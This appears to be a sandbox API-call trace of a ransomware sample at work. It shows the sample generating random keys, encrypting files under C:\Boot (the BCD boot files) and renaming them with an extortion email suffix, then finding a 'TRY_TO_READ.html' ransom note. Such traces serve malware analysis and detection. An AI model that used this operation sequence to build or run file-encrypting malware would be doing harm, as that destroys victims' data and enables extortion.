	[0051.915] WriteFile (in: hFile=0x3c4, lpBuffer=0x596570*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596570*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0051.915] WriteFile (in: hFile=0x3c4, lpBuffer=0x596570*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596570*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0051.916] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10000) returned 0x5a7fc0
	[0051.916] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10000) returned 0x5b7fc8
	[0051.916] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.916] ReadFile (in: hFile=0x3c4, lpBuffer=0x5a7fc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a7fc0*, lpNumberOfBytesRead=0x3a1f778*=0x10000, lpOverlapped=0x0) returned 1
	[0051.918] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=-65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.918] WriteFile (in: hFile=0x3c4, lpBuffer=0x5b7fc8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b7fc8*, lpNumberOfBytesWritten=0x3a1f778*=0x10000, lpOverlapped=0x0) returned 1
	[0051.918] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7fc0 | out: hHeap=0x540000) returned 1
	[0051.919] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b7fc8 | out: hHeap=0x540000) returned 1
	[0051.920] CloseHandle (hObject=0x3c4) returned 1
	[0051.921] GetProcessHeap () returned 0x540000
	[0051.921] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7eb8 | out: hHeap=0x540000) returned 1
	[0051.921] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7db0 | out: hHeap=0x540000) returned 1
	[0051.921] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.921] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583aa0 | out: hHeap=0x540000) returned 1
	[0051.921] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.921] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.921] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a7db0
	[0051.921] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.921] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a7db0 | out: pbBuffer=0x5a7db0) returned 1
	[0051.921] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596570 | out: pbBuffer=0x596570) returned 1
	[0051.921] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG2", dwFileAttributes=0x80) returned 1
	[0051.922] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG2") returned 17
	[0051.922] GetProcessHeap () returned 0x540000
	[0051.922] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x88) returned 0x5832a8
	[0051.922] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\BCD.LOG2" | out: lpString1="C:\\\\Boot\\BCD.LOG2") returned="C:\\\\Boot\\BCD.LOG2"
	[0051.922] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG2", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.922] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log2.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.924] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log2.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.924] GetProcessHeap () returned 0x540000
	[0051.924] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.924] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=0) returned 1
	[0051.924] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x0
	[0051.924] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0051.924] GetProcessHeap () returned 0x540000
	[0051.924] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5a7eb8
	[0051.924] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5a7eb8*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5a7eb8*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0051.924] WriteFile (in: hFile=0x3c4, lpBuffer=0x5a7eb8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a7eb8*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0051.925] WriteFile (in: hFile=0x3c4, lpBuffer=0x596570*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596570*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0051.925] WriteFile (in: hFile=0x3c4, lpBuffer=0x596570*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596570*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0051.925] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1) returned 0x596580
	[0051.925] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1) returned 0x596590
	[0051.925] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.925] ReadFile (in: hFile=0x3c4, lpBuffer=0x596580, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596580*, lpNumberOfBytesRead=0x3a1f778*=0x0, lpOverlapped=0x0) returned 1
	[0051.925] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.925] WriteFile (in: hFile=0x3c4, lpBuffer=0x596590*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596590*, lpNumberOfBytesWritten=0x3a1f778*=0x0, lpOverlapped=0x0) returned 1
	[0051.925] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596580 | out: hHeap=0x540000) returned 1
	[0051.925] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.925] CloseHandle (hObject=0x3c4) returned 1
	[0051.926] GetProcessHeap () returned 0x540000
	[0051.926] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7eb8 | out: hHeap=0x540000) returned 1
	[0051.926] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7db0 | out: hHeap=0x540000) returned 1
	[0051.926] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.926] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.926] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.926] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.926] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a7db0
	[0051.926] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.926] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a7db0 | out: pbBuffer=0x5a7db0) returned 1
	[0051.926] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596570 | out: pbBuffer=0x596570) returned 1
	[0051.926] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG1", dwFileAttributes=0x80) returned 1
	[0051.927] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG1") returned 17
	[0051.927] GetProcessHeap () returned 0x540000
	[0051.927] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x88) returned 0x5832a8
	[0051.927] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\BCD.LOG1" | out: lpString1="C:\\\\Boot\\BCD.LOG1") returned="C:\\\\Boot\\BCD.LOG1"
	[0051.927] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG1", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.927] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log1.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.929] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log1.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.929] GetProcessHeap () returned 0x540000
	[0051.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.929] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=0) returned 1
	[0051.929] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x0
	[0051.929] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0051.929] GetProcessHeap () returned 0x540000
	[0051.929] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5a7eb8
	[0051.929] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5a7eb8*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5a7eb8*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0051.929] WriteFile (in: hFile=0x3c4, lpBuffer=0x5a7eb8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a7eb8*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0051.930] WriteFile (in: hFile=0x3c4, lpBuffer=0x596570*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596570*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0051.930] WriteFile (in: hFile=0x3c4, lpBuffer=0x596570*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596570*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0051.930] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1) returned 0x596590
	[0051.930] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1) returned 0x596580
	[0051.930] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.930] ReadFile (in: hFile=0x3c4, lpBuffer=0x596590, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596590*, lpNumberOfBytesRead=0x3a1f778*=0x0, lpOverlapped=0x0) returned 1
	[0051.930] SetFilePointer (in: hFile=0x3c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.930] WriteFile (in: hFile=0x3c4, lpBuffer=0x596580*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596580*, lpNumberOfBytesWritten=0x3a1f778*=0x0, lpOverlapped=0x0) returned 1
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596580 | out: hHeap=0x540000) returned 1
	[0051.931] CloseHandle (hObject=0x3c4) returned 1
	[0051.931] GetProcessHeap () returned 0x540000
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7eb8 | out: hHeap=0x540000) returned 1
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7db0 | out: hHeap=0x540000) returned 1
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.931] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.931] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a7db0
	[0051.931] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.931] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a7db0 | out: pbBuffer=0x5a7db0) returned 1
	[0051.931] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596570 | out: pbBuffer=0x596570) returned 1
	[0051.932] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 1
	[0051.932] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG") returned 16
	[0051.932] GetProcessHeap () returned 0x540000
	[0051.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x86) returned 0x5832a8
	[0051.932] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\BCD.LOG" | out: lpString1="C:\\\\Boot\\BCD.LOG") returned="C:\\\\Boot\\BCD.LOG"
	[0051.932] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.932] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), lpNewFileName="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.932] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.932] GetProcessHeap () returned 0x540000
	[0051.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.932] CloseHandle (hObject=0xffffffff) returned 0
	[0051.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5940
	[0051.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a7eb8
	[0051.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596580
	[0051.932] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a7eb8 | out: pbBuffer=0x5a7eb8) returned 1
	[0051.932] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596580 | out: pbBuffer=0x596580) returned 1
	[0051.932] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD", dwFileAttributes=0x80) returned 1
	[0051.933] lstrlenW (lpString="C:\\\\Boot\\BCD") returned 12
	[0051.933] GetProcessHeap () returned 0x540000
	[0051.933] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7e) returned 0x588cd8
	[0051.933] lstrcpyW (in: lpString1=0x588cd8, lpString2="C:\\\\Boot\\BCD" | out: lpString1="C:\\\\Boot\\BCD") returned="C:\\\\Boot\\BCD"
	[0051.933] lstrcatW (in: lpString1="C:\\\\Boot\\BCD", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.933] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), lpNewFileName="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.933] CreateFileW (lpFileName="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.933] GetProcessHeap () returned 0x540000
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.933] CloseHandle (hObject=0xffffffff) returned 0
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5940 | out: hHeap=0x540000) returned 1
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596da0 | out: hHeap=0x540000) returned 1
	[0051.933] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596dc8 | out: hHeap=0x540000) returned 1
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e40 | out: hHeap=0x540000) returned 1
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0051.933] FindFirstFileW (in: lpFileName="C:\\\\Config.Msi\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x574e20
	[0051.933] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.933] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.933] GetLastError () returned 0x6
	[0051.933] SetLastError (dwErrCode=0x6) 
	[0051.933] GetLastError () returned 0x6
	[0051.933] SetLastError (dwErrCode=0x6) 
	[0051.933] GetLastError () returned 0x6
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574f60
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574f60 | out: hHeap=0x540000) returned 1
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.934] FindNextFileW (in: hFindFile=0x574e20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.934] GetLastError () returned 0x6
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e18
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574f60
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574f60 | out: hHeap=0x540000) returned 1
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.934] FindNextFileW (in: hFindFile=0x574e20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.934] GetLastError () returned 0x6
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.934] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.935] FindNextFileW (in: hFindFile=0x574e20, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.935] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x46) returned 0x5939a0
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.935] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e68 | out: hHeap=0x540000) returned 1
